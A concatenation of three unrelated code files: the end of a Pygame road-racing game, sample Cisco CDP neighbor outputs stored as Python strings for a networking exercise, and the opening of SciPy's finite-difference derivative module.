di = self.key_to_di_b(event.key)
if di is not None:
e_keys_dn.append(di)
else:
r_events.append(event)
else:
r_events.append(event)
self.e_keys_up = e_keys_up
self.e_keys_dn = e_keys_dn
return r_events
def refresh__1(self, fps_clock, *args, **kwargs):
#print '>>> refresh'
#'''
if self.player_di == 3: # <
self.player_x -= 9
if self.player_x < -1000:
self.player_di = 1
elif self.player_di == 1:
self.player_x += 19
if self.player_x > 1000:
self.player_di = 3
#'''
#'''
self.position += 10.0#5.0#1.0
self.position += random.randint(2, 10)
if self.position > self.track_len:
self.position -= self.track_len
#'''
self.draw_on()
self.rd_seg_render()
def refresh(self, fps_clock, *args, **kwargs):
self.check_player_di(self.e_keys_dn, self.e_keys_up)
self.draw_on()
self.rd_seg_render()
self.update_world()
self.check_if_car_out_road()
self.check_score()
self.check_tm()
self.update_bg()
def check_player_di(self, e_keys_dn, e_keys_up):
if 0 in e_keys_dn:
self.player_go = 1
elif 2 in e_keys_dn:
self.player_go = 2
if 1 in e_keys_dn:
self.player_di = 1
elif 3 in e_keys_dn:
self.player_di = 3
if 0 in e_keys_up:
if self.player_go != 2:
self.player_go = 0
if 2 in e_keys_up:
if self.player_go != 1:
self.player_go = 0
if 1 in e_keys_up:
if self.player_di != 3:
self.player_di = 0
if 3 in e_keys_up:
if self.player_di != 1:
self.player_di = 0
def update_world(self):
if self.player_go == 1:
self.speed += self.speed_dt_up
elif self.player_go == 2:
self.speed -= self.speed_dt_dn
else:
self.speed -= self.speed_dt_na
# if on the grass, slow down
if self.player_x < -self.road_w / 2 or \
self.player_x > self.road_w / 2:
self.speed -= 10
if self.speed < 0.0:
self.speed = 0.0
elif self.speed > self.speed_max:
self.speed = self.speed_max
self.position += self.speed
if self.position > self.track_len:
self.position -= self.track_len
# for check score
self.last_seg_i = 0
self.game_over = True
self.game_score = 1.0
if self.player_di == 1:
#self.player_x += self.player_x_dt
self.player_x += self.speed / 5 + 20
elif self.player_di == 3:
#self.player_x -= self.player_x_dt
self.player_x -= self.speed / 5 + 20
else:
pass
p_curve = self.player_seg.get('curve', 0.0)
#print 'p_curve', p_curve
p_dt = self.speed * p_curve * self.centrifugal
#print p_dt
#self.player_x -= p_dt
self.player_x += p_dt
def check_if_car_out_road(self):
# decrease score when go out the road
if self.player_x < -self.road_w / 2 or \
self.player_x > self.road_w / 2:
if self.score > 0:
self.score -= 1
#self.score -= 1
#if self.score < 0:
# self.score = 0
self.game_over = True
self.game_score = -1.0
def check_score(self):
# make sure we check score once for a segment
seg_i = self.player_seg['index']
if seg_i > self.last_seg_i:
self.last_seg_i = seg_i
else:
return
# NOTE: here we should use the segment just under the car
#sprts = self.player_seg['sprites']
sprts = self.base_seg['sprites']
if not sprts:
return
# NOTE: we now only use the first sprite !
sprt = sprts[0]
x_i = sprt.get('x_i')
if x_i is None:
return
scr = sprt.get('score')
if not scr: # None or 0
return
obj = sprt.get('obj')
if not obj: # None or 0
return
#rd_w_half = self.road_w / 2
#x_pos = [rd_w_half + self.lane_w,
# rd_w_half - self.lane_w]
sprt_x = obj.rect.left
sprt_w = obj.rect.width
car_x = self.player_x
car_w = self.car.rect.width * 2
sprt_at = 10000
if x_i == 0:
sprt_at = 40
elif x_i == 1:
sprt_at = -40
elif x_i == 2:
sprt_at = 580
elif x_i == 3:
sprt_at = -580
elif x_i == 4:
sprt_at = 1100
elif x_i == 5:
sprt_at = -1100
#print 'sprt_x', sprt_x
#print 'car_x', car_x
#print 'car_w', car_w
#print 'sprt_at', (car_x - car_w / 2), sprt_at, (car_x + car_w / 2)
#print '-' * 40
w_half = car_w / 2 + sprt_w / 2
#if (car_x + car_w / 2) < sprt_x < (car_x + car_w / 2):
if (car_x - w_half) < sprt_at < (car_x + w_half):
self.score += scr
def check_tm(self):
if self.position > self.seg_len * 2:
if self.tm_start == 0.0:
self.tm_start = time.time()
self.tm_end = self.tm_start
else:
self.tm_end = time.time()
self.tm_last_once = self.tm_end - self.tm_start
else:
self.tm_start = 0.0
#self.tm_end = 0.0
def update_bg(self):
# always move the cloud
for sky in self.bg_sky:
sky.rect.left -= 1#self.sky_speed
if sky.rect.left + sky.rect.width < 0:
sky.rect.left += sky.rect.width * 2
if sky.rect.left - sky.rect.width > 0:
sky.rect.left -= sky.rect.width * 2
if self.speed <= 0.0:
return
p_curve = self.player_seg.get('curve', 0.0)
#p_curve = 3
#print 'p_curve', p_curve
p_dt = self.speed * p_curve * self.centrifugal
#p_dt = 40
#p_dt = -40
#p_dt = random.randint(-100, 100)
#print p_dt
for sky in self.bg_sky:
#print sky
sky.rect.left += int(self.sky_speed * p_dt)
# always move the cloud
#sky.rect.left -= self.sky_speed
if sky.rect.left + sky.rect.width < 0:
sky.rect.left += sky.rect.width * 2
if sky.rect.left - sky.rect.width > 0:
sky.rect.left -= sky.rect.width * 2
for hill in self.bg_hills:
hill.rect.left += int(self.hill_speed * p_dt)
if hill.rect.left + hill.rect.width < 0:
hill.rect.left += hill.rect.width * 2
if hill.rect.left - hill.rect.width > 0:
hill.rect.left -= hill.rect.width * 2
for trees in self.bg_trees:
trees.rect.left += int(self.tree_speed * p_dt)
if trees.rect.left + trees.rect.width < 0:
trees.rect.left += trees.rect.width * 2
if trees.rect.left - trees.rect.width > 0:
trees.rect.left -= trees.rect.width * 2
class FPSptRoadMap(sptdraw.SptDrawBase):
def __init__(self, size, segs, rad, *args, **kwargs):
super(FPSptRoadMap, self).__init__(size)
self.segs = segs
self.rad = rad
#self.fill(consts.WHITE)
self.draw_segs(self.segs, self.rad)
def xy_to_cntr(self, x, y):
return [self.size[0] / 2 + x, self.size[1] / 2 - y]
def cv_to_engl(self, curve, rad):
a = float(curve) / rad
#a *= 10.0
#print a
s = 1.0
if a < 0.0:
s = -1.0
if a < -1.0:
a = -1.0
elif a > 1.0:
a = 1.0
#tht_d = math.acos(a)
tht_d = math.asin(a)
return tht_d
def get_segs_pnts(self, segs, rad):
pnts = []
x, y = 0.0, 0.0
tht = 0.0
rad_m = 4.0#2.0#1.0#
cv_s = 0
cv_l = 0.0
pnts.append([x, y])
for seg in segs:
curve = seg.get('curve', 0.0)
if curve == 0.0:
if cv_s:
tht_d = self.cv_to_engl(cv_l, rad)
#tht += tht_d
tht -= tht_d
rad_m = 20.0#10.0#50.0#
cv_s = 0
cv_l = 0.0
else:
rad_m = 0.5#1.0#0.1#
else:
if cv_s:
cv_l += curve
else:
cv_s = 1
continue
x += rad_m * math.cos(tht)
y += rad_m * math.sin(tht)
pnts.append([x, y])
#print pnts
return pnts
def get_segs_pnts_1(self, segs, rad):
pnts = []
x, y = 0.0, 0.0
tht = 0.0
rad_m = 4.0#2.0#1.0#
pnts.append([x, y])
for seg in segs:
curve = seg.get('curve', 0.0)
if curve == 0.0:
rad_m = 1.0#0.1#
else:
a = float(curve) / rad
a *= 10.0
#print a
if a < -1.0:
a = -1.0
elif a > 1.0:
a = 1.0
#tht_d = math.acos(a)
tht_d = math.asin(a) # TODO:
tht += tht_d
rad_m = 10.0#50.0#
x += rad_m * math.cos(tht)
y += rad_m * math.sin(tht)
pnts.append([x, y])
#print pnts
return pnts
def draw_segs(self, segs, rad):
pnts = self.get_segs_pnts(segs, rad)
#print pnts
if len(pnts) <= 1:
return
#if len(pnts) > 0:
# pnts.append(pnts[0])
cpnts = [self.xy_to_cntr(p[0], p[1]) for p in pnts]
c = utils.clr_from_str(FP_COLOR_BLUE)
#self.pygm.draw.polygon(self.surf, c, cpnts)
self.pygm.draw.lines(self.surf, c, False, cpnts, 3)
class FPSptProgress(sptdraw.SptDrawBase):
def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN):
super(FPSptProgress, self).__init__(size)
self.c_bg = c_bg
self.c_prog = c_prog
self.progress(0.0)
def progress(self, prog):
y = self.size[1] * prog
self.fill(self.c_bg)
#self.pygm.draw.rect(self.surf, consts.GREEN,
# [1, 0, self.size[0] - 2, y])
# from down to up
self.pygm.draw.rect(self.surf, self.c_prog,
[1, self.size[1] - y,
self.size[0] - 2, y])
class FPStraight(pygm.PyGMSprite):
def __init__(self, cfg, *args, **kwargs):
super(FPStraight, self).__init__()
self.cfg = cfg
self.bg_sky1 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['SKY'])
self.bg_sky1.rect.top = 0
self.bg_sky1.rect.left = 0
self.disp_add(self.bg_sky1)
self.bg_sky2 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['SKY'])
self.bg_sky2.rect.top = 0
self.bg_sky2.rect.left = self.bg_sky1.rect.width
self.disp_add(self.bg_sky2)
self.bg_hills1 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['HILLS'])
self.bg_hills1.rect.top = 0
self.bg_hills1.rect.left = 0
self.disp_add(self.bg_hills1)
self.bg_hills2 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['HILLS'])
self.bg_hills2.rect.top = 0
self.bg_hills2.rect.left = self.bg_hills1.rect.width
self.disp_add(self.bg_hills2)
self.bg_trees1 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['TREES'])
self.bg_trees1.rect.top = 0
self.bg_trees1.rect.left = 0
self.disp_add(self.bg_trees1)
self.bg_trees2 = FPSptBg('img_flatpath/images/background.png',
IMG_POS_BACKGROUND['TREES'])
self.bg_trees2.rect.top = 0
self.bg_trees2.rect.left = self.bg_trees1.rect.width
self.disp_add(self.bg_trees2)
self.car = FPSptSprts('img_flatpath/images/sprites.png',
IMG_POS_SPRITES['PLAYER_STRAIGHT'])
#print self.road.cameraDepth/self.road.playerZ
#self.car.scale(self.road.cameraDepth/self.road.playerZ)
self.car.scale(2)
self.car.rect.top = 400
self.car.rect.left = (640 - self.car.rect.width) / 2
##self.disp_add(self.car) # car disp add after road
#self.road = FPSptRoad((640, 240), self.cfg)
self.road = FPSptRoadB((640, 240), self.cfg,
car=self.car,
bg_sky=[self.bg_sky1, self.bg_sky2],
bg_hills=[self.bg_hills1, self.bg_hills2],
bg_trees=[self.bg_trees1, self.bg_trees2])
self.road.rect.top = 240
self.road.rect.left = 0
self.disp_add(self.road)
self.disp_add(self.car)
self.rdmap = FPSptRoadMap((480, 480),
self.road.rd_get_segs(whole=True),
self.road.seg_len)
self.rdmap.rect.top = 0
self.rdmap.rect.left = 80
self.rdmap.rotate(90)
self.disp_add(self.rdmap)
self.rdpsd = pygm.SptLbl(str(int(self.road.speed)),
c=consts.GREEN, font_size=12)
self.rdpsd.rect.top = 456
self.rdpsd.rect.left = 312
self.disp_add(self.rdpsd)
self.scr = pygm.SptLbl(str(int(self.road.score)),
c=consts.RED, font_size=16)
self.scr.rect.top = 40#454
self.scr.rect.left = 600
self.disp_add(self.scr)
self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)),
c=consts.YELLOW, font_size=16)
self.tm_once.rect.top = 20#454
self.tm_once.rect.left = 600
self.disp_add(self.tm_once)
self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW)
self.prog.rect.top = 70#340
self.prog.rect.left = 610
#self.prog.rotate(180)
self.disp_add(self.prog)
self.spd = FPSptProgress((4, 100), c_prog=consts.GREEN)
self.spd.rect.top = 70#340
self.spd.rect.left = 602
#self.spd.rotate(180)
self.disp_add(self.spd)
def rdmap_hide(self):
self.rdmap.hide()
def rdmap_reset(self):
self.rdmap.clear()
self.rdmap.draw_segs(self.road.rd_get_segs(whole=True),
self.road.seg_len)
self.rdmap.rotate(90)
def road_reset(self):
self.road.rd_reset()
self.rdmap_reset()
def road_reset_keep_segs(self):
self.road.rd_reset(init=False, keep_segs=True)
def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'):
segs_file = utils.dir_abs(segs_file, __file__)
self.road.rd_reset(init=False, keep_segs=False,
segs_file=segs_file)
self.rdmap_reset()
def road_segs_to_file(self, segs_file=None):
if not segs_file:
segs_file = 'sr_roads/sr_road_' + str(int(time.time())) + '.txt'
segs_file = utils.dir_abs(segs_file, __file__)
self.road.rd_seg_json_save(segs_file)
def handle_event(self, events, *args, **kwargs):
#return events
r_events = []
for event in events:
#print event
if event.type == self.pglc.KEYUP:
k = event.key
if k == self.pglc.K_SPACE:
# hide / show road map
self.rdmap_hide()
elif k == self.pglc.K_RETURN:
self.road_reset()
elif k == self.pglc.K_TAB:
self.road_reset_keep_segs()
elif k == self.pglc.K_BACKSPACE:
self.road_reset_from_file()
elif k == self.pglc.K_SLASH:
self.road_segs_to_file()
else:
r_events.append(event)
elif event.type == self.pglc.KEYDOWN:
r_events.append(event)
else:
r_events.append(event)
return r_events
def refresh(self, fps_clock, *args, **kwargs):
self.rdpsd.lbl_set(str(int(self.road.speed)))
self.scr.lbl_set(str(int(self.road.score)))
self.tm_once.lbl_set(str(int(self.road.tm_last_once)))
prg = self.road.position / self.road.track_len
self.prog.progress(prg)
spdc = self.road.speed / self.road.speed_max
self.spd.progress(spdc)
class FPSceneA(pygm.PyGMScene):
def __init__(self, *args, **kwargs):
super(FPSceneA, self).__init__(*args, **kwargs)
self.straight = FPStraight({})
self.straight.rect.top = 0
self.straight.rect.left = 0
self.disp_add(self.straight)
''''
self.sn1 = SptTmpx((200, 200))
self.sn1.rect.top = 100
self.sn1.rect.left = 100
self.disp_add(self.sn1)
'''
'''
self.lb1 = pygm.SptLbl('hello,', c=consts.GREEN, font_size=32)
self.lb1.rect.top = 200
self.lb1.rect.left = 100
self.disp_add(self.lb1)
'''
def handle_event(self, events, *args, **kwargs):
return events
def refresh(self, fps_clock, *args, **kwargs):
pass
class GMFlatpath(pygm.PyGMGame):
def __init__(self, title, winw, winh, *args, **kwargs):
super(GMFlatpath, self).__init__(title, winw, winh)
bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg', __file__)
#self.bk = pygm.SptImg('data/img_bk_1.jpg')
self.bk = pygm.SptImg(bk_im)
self.bk.rect.top = -230
self.bk.rect.left = -230
#self.disp_add(self.bk)
self.scn1 = FPSceneA()
self.disp_add(self.scn1)
road_file = kwargs.get('road_file')
if road_file:
self.scn1.straight.road_reset_from_file(segs_file=road_file)
def main():
#sf = GMFlatpath('flatpath <:::>', 640, 480)
sf = GMFlatpath('flatpath <:::>', 640, 480, road_file='sr_road.txt')
sf.mainloop()
if __name__ == '__main__':
main()
| 2.75 | 3 |
First_course/test5_base.py | laetrid/learning | 0 | 1264 | <reponame>laetrid/learning<filename>First_course/test5_base.py
#!/usr/bin/env python
sw1_show_cdp_neighbors = '''
SW1>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater, P - Phone
Device ID Local Intrfce Holdtme Capability Platform Port ID
R1 Fas 0/11 153 R S I 881 Fas 1
R2 Fas 0/12 123 R S I 881 Fas 1
R3 Fas 0/13 129 R S I 881 Fas 1
R4 Fas 0/14 173 R S I 881 Fas 1
R5 Fas 0/15 144 R S I 881 Fas 1
'''
sw1_show_cdp_neighbors_detail = '''
SW1> show cdp neighbors detail
--------------------------
Device ID: R1
Entry address(es):
IP address: 10.1.1.1
Platform: Cisco 881, Capabilities: Router Switch IGMP
Interface: FastEthernet0/11, Port ID (outgoing port): FastEthernet1
Holdtime: 153 sec
Version :
Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Fri 29-Oct-10 00:02 by prod_rel_team
advertisement version: 2
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
Management address(es):
--------------------------
Device ID: R2
Entry address(es):
IP address: 10.1.1.2
Platform: Cisco 881, Capabilities: Router Switch IGMP
Interface: FastEthernet0/12, Port ID (outgoing port): FastEthernet1
Holdtime: 123 sec
Version :
Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Fri 29-Oct-10 00:02 by prod_rel_team
advertisement version: 2
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
Management address(es):
--------------------------
Device ID: R3
Entry address(es):
IP address: 10.1.1.3
Platform: Cisco 881, Capabilities: Router Switch IGMP
Interface: FastEthernet0/13, Port ID (outgoing port): FastEthernet1
Holdtime: 129 sec
Version :
Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Fri 29-Oct-10 00:02 by prod_rel_team
advertisement version: 2
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
Management address(es):
--------------------------
Device ID: R4
Entry address(es):
IP address: 10.1.1.4
Platform: Cisco 881, Capabilities: Router Switch IGMP
Interface: FastEthernet0/14, Port ID (outgoing port): FastEthernet1
Holdtime: 173 sec
Version :
Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Fri 29-Oct-10 00:02 by prod_rel_team
advertisement version: 2
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
Management address(es):
--------------------------
Device ID: R5
Entry address(es):
IP address: 10.1.1.5
Platform: Cisco 881, Capabilities: Router Switch IGMP
Interface: FastEthernet0/15, Port ID (outgoing port): FastEthernet1
Holdtime: 144 sec
Version :
Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.0(1)M4, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2010 by Cisco Systems, Inc.
Compiled Fri 29-Oct-10 00:02 by prod_rel_team
advertisement version: 2
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
Management address(es):
'''
r1_show_cdp_neighbors = '''
R1>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
SW1 Fas 1 150 S I WS-C2950- Fas 0/11
'''
r1_show_cdp_neighbors_detail = '''
R1>show cdp neighbors detail
-------------------------
Device ID: SW1
Entry address(es):
IP address: 10.1.1.22
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/11
Holdtime : 145 sec
Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2006 by cisco Systems, Inc.
Compiled Fri 28-Jul-06 15:16 by weiliu
advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
'''
r2_show_cdp_neighbors = '''
R2>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
SW1 Fas 1 150 S I WS-C2950- Fas 0/12
'''
r2_show_cdp_neighbors_detail = '''
R2>show cdp neighbors detail
-------------------------
Device ID: SW1
Entry address(es):
IP address: 10.1.1.22
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/12
Holdtime : 145 sec
Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2006 by cisco Systems, Inc.
Compiled Fri 28-Jul-06 15:16 by weiliu
advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
'''
r3_show_cdp_neighbors = '''
R3>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
SW1 Fas 1 150 S I WS-C2950- Fas 0/13
'''
r3_show_cdp_neighbors_detail = '''
R3>show cdp neighbors detail
-------------------------
Device ID: SW1
Entry address(es):
IP address: 10.1.1.22
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/13
Holdtime : 145 sec
Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2006 by cisco Systems, Inc.
Compiled Fri 28-Jul-06 15:16 by weiliu
advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
'''
r4_show_cdp_neighbors = '''
R4>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
SW1 Fas 1 150 S I WS-C2950- Fas 0/14
'''
r4_show_cdp_neighbors_detail = '''
R4>show cdp neighbors detail
-------------------------
Device ID: SW1
Entry address(es):
IP address: 10.1.1.22
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/14
Holdtime : 145 sec
Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2006 by cisco Systems, Inc.
Compiled Fri 28-Jul-06 15:16 by weiliu
advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
'''
r5_show_cdp_neighbors = '''
R5>show cdp neighbors
Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge
S - Switch, H - Host, I - IGMP, r - Repeater
Device ID Local Intrfce Holdtme Capability Platform Port ID
SW1 Fas 1 150 S I WS-C2950- Fas 0/15
'''
r5_show_cdp_neighbors_detail = '''
R5>show cdp neighbors detail
-------------------------
Device ID: SW1
Entry address(es):
IP address: 10.1.1.22
Platform: cisco WS-C2950-24, Capabilities: Switch IGMP
Interface: FastEthernet1, Port ID (outgoing port): FastEthernet0/15
Holdtime : 145 sec
Version :
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA8a, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2006 by cisco Systems, Inc.
Compiled Fri 28-Jul-06 15:16 by weiliu
advertisement version: 2
Protocol Hello: OUI=0x00000C, Protocol ID=0x0112; payload len=27, value=00000000FFFFFFFF010221FF0000000000000019E845CE80FF0000
VTP Management Domain: ''
Native VLAN: 1
Duplex: full
'''
| 2.09375 | 2 |
scipy/optimize/_numdiff.py | jeremiedbb/scipy | 1 | 1265 | """Routines for numerical differentiation."""
from __future__ import division
import numpy as np
from numpy.linalg import norm
from scipy.sparse.linalg import LinearOperator
from ..sparse import issparse, csc_matrix, csr_matrix, coo_matrix, find
from ._group_columns import group_dense, group_sparse
EPS = np.finfo(np.float64).eps
def _adjust_scheme_to_bounds(x0, h, num_steps, scheme, lb, ub):
"""Adjust final difference scheme to the presence of bounds.
Parameters
----------
x0 : ndarray, shape (n,)
Point at which we wish to estimate derivative.
h : ndarray, shape (n,)
Desired finite difference steps.
num_steps : int
Number of `h` steps in one direction required to implement finite
difference scheme. For example, 2 means that we need to evaluate
f(x0 + 2 * h) or f(x0 - 2 * h)
scheme : {'1-sided', '2-sided'}
Whether steps in one or both directions are required. In other
words '1-sided' applies to forward and backward schemes, '2-sided'
applies to center schemes.
lb : ndarray, shape (n,)
Lower bounds on independent variables.
ub : ndarray, shape (n,)
Upper bounds on independent variables.
Returns
-------
h_adjusted : ndarray, shape (n,)
Adjusted step sizes. Step size decreases only if a sign flip or
switching to one-sided scheme doesn't allow to take a full step.
use_one_sided : ndarray of bool, shape (n,)
Whether to switch to one-sided scheme. Informative only for
``scheme='2-sided'``.
"""
if scheme == '1-sided':
use_one_sided = np.ones_like(h, dtype=bool)
elif scheme == '2-sided':
h = np.abs(h)
use_one_sided = np.zeros_like(h, dtype=bool)
else:
raise ValueError("`scheme` must be '1-sided' or '2-sided'.")
if np.all((lb == -np.inf) & (ub == np.inf)):
return h, use_one_sided
h_total = h * num_steps
h_adjusted = h.copy()
lower_dist = x0 - lb
upper_dist = ub - x0
if scheme == '1-sided':
x = x0 + h_total
violated = (x < lb) | (x > ub)
fitting = np.abs(h_total) <= np.maximum(lower_dist, upper_dist)
h_adjusted[violated & fitting] *= -1
forward = (upper_dist >= lower_dist) & ~fitting
h_adjusted[forward] = upper_dist[forward] / num_steps
backward = (upper_dist < lower_dist) & ~fitting
h_adjusted[backward] = -lower_dist[backward] / num_steps
elif scheme == '2-sided':
central = (lower_dist >= h_total) & (upper_dist >= h_total)
forward = (upper_dist >= lower_dist) & ~central
h_adjusted[forward] = np.minimum(
h[forward], 0.5 * upper_dist[forward] / num_steps)
use_one_sided[forward] = True
backward = (upper_dist < lower_dist) & ~central
h_adjusted[backward] = -np.minimum(
h[backward], 0.5 * lower_dist[backward] / num_steps)
use_one_sided[backward] = True
min_dist = np.minimum(upper_dist, lower_dist) / num_steps
adjusted_central = (~central & (np.abs(h_adjusted) <= min_dist))
h_adjusted[adjusted_central] = min_dist[adjusted_central]
use_one_sided[adjusted_central] = False
return h_adjusted, use_one_sided
relative_step = {"2-point": EPS**0.5,
"3-point": EPS**(1/3),
"cs": EPS**0.5}
def _compute_absolute_step(rel_step, x0, method):
if rel_step is None:
rel_step = relative_step[method]
sign_x0 = (x0 >= 0).astype(float) * 2 - 1
return rel_step * sign_x0 * np.maximum(1.0, np.abs(x0))
def _prepare_bounds(bounds, x0):
lb, ub = [np.asarray(b, dtype=float) for b in bounds]
if lb.ndim == 0:
lb = np.resize(lb, x0.shape)
if ub.ndim == 0:
ub = np.resize(ub, x0.shape)
return lb, ub
def group_columns(A, order=0):
"""Group columns of a 2-D matrix for sparse finite differencing [1]_.
Two columns are in the same group if in each row at least one of them
has zero. A greedy sequential algorithm is used to construct groups.
Parameters
----------
A : array_like or sparse matrix, shape (m, n)
Matrix of which to group columns.
order : int, iterable of int with shape (n,) or None
Permutation array which defines the order of columns enumeration.
If int or None, a random permutation is used with `order` used as
a random seed. Default is 0, that is use a random permutation but
guarantee repeatability.
Returns
-------
groups : ndarray of int, shape (n,)
Contains values from 0 to n_groups-1, where n_groups is the number
of found groups. Each value ``groups[i]`` is an index of a group to
which ith column assigned. The procedure was helpful only if
n_groups is significantly less than n.
References
----------
.. [1] <NAME>, <NAME>, and <NAME>, "On the estimation of
sparse Jacobian matrices", Journal of the Institute of Mathematics
and its Applications, 13 (1974), pp. 117-120.
"""
if issparse(A):
A = csc_matrix(A)
else:
A = np.atleast_2d(A)
A = (A != 0).astype(np.int32)
if A.ndim != 2:
raise ValueError("`A` must be 2-dimensional.")
m, n = A.shape
if order is None or np.isscalar(order):
rng = np.random.RandomState(order)
order = rng.permutation(n)
else:
order = np.asarray(order)
if order.shape != (n,):
raise ValueError("`order` has incorrect shape.")
A = A[:, order]
if issparse(A):
groups = group_sparse(m, n, A.indices, A.indptr)
else:
groups = group_dense(m, n, A)
groups[order] = groups.copy()
return groups
def approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None,
bounds=(-np.inf, np.inf), sparsity=None,
as_linear_operator=False, args=(), kwargs={}):
"""Compute finite difference approximation of the derivatives of a
vector-valued function.
If a function maps from R^n to R^m, its derivatives form m-by-n matrix
called the Jacobian, where an element (i, j) is a partial derivative of
f[i] with respect to x[j].
Parameters
----------
fun : callable
Function of which to estimate the derivatives. The argument x
passed to this function is ndarray of shape (n,) (never a scalar
even if n=1). It must return 1-D array_like of shape (m,) or a scalar.
x0 : array_like of shape (n,) or float
Point at which to estimate the derivatives. Float will be converted
to a 1-D array.
method : {'3-point', '2-point', 'cs'}, optional
Finite difference method to use:
- '2-point' - use the first order accuracy forward or backward
difference.
- '3-point' - use central difference in interior points and the
second order accuracy forward or backward difference
near the boundary.
- 'cs' - use a complex-step finite difference scheme. This assumes
that the user function is real-valued and can be
analytically continued to the complex plane. Otherwise,
produces bogus results.
rel_step : None or array_like, optional
Relative step size to use. The absolute step size is computed as
``h = rel_step * sign(x0) * max(1, abs(x0))``, possibly adjusted to
fit into the bounds. For ``method='3-point'`` the sign of `h` is
ignored. If None (default) then step is selected automatically,
see Notes.
f0 : None or array_like, optional
If not None it is assumed to be equal to ``fun(x0)``, in this case
the ``fun(x0)`` is not called. Default is None.
bounds : tuple of array_like, optional
Lower and upper bounds on independent variables. Defaults to no bounds.
Each bound must match the size of `x0` or be a scalar, in the latter
case the bound will be the same for all variables. Use it to limit the
range of function evaluation. Bounds checking is not implemented
when `as_linear_operator` is True.
sparsity : {None, array_like, sparse matrix, 2-tuple}, optional
Defines a sparsity structure of the Jacobian matrix. If the Jacobian
matrix is known to have only few non-zero elements in each row, then
it's possible to estimate its several columns by a single function
evaluation [3]_. To perform such economic computations two ingredients
are required:
* structure : array_like or sparse matrix of shape (m, n). A zero
element means that a corresponding element of the Jacobian
identically equals to zero.
* groups : array_like of shape (n,). A column grouping for a given
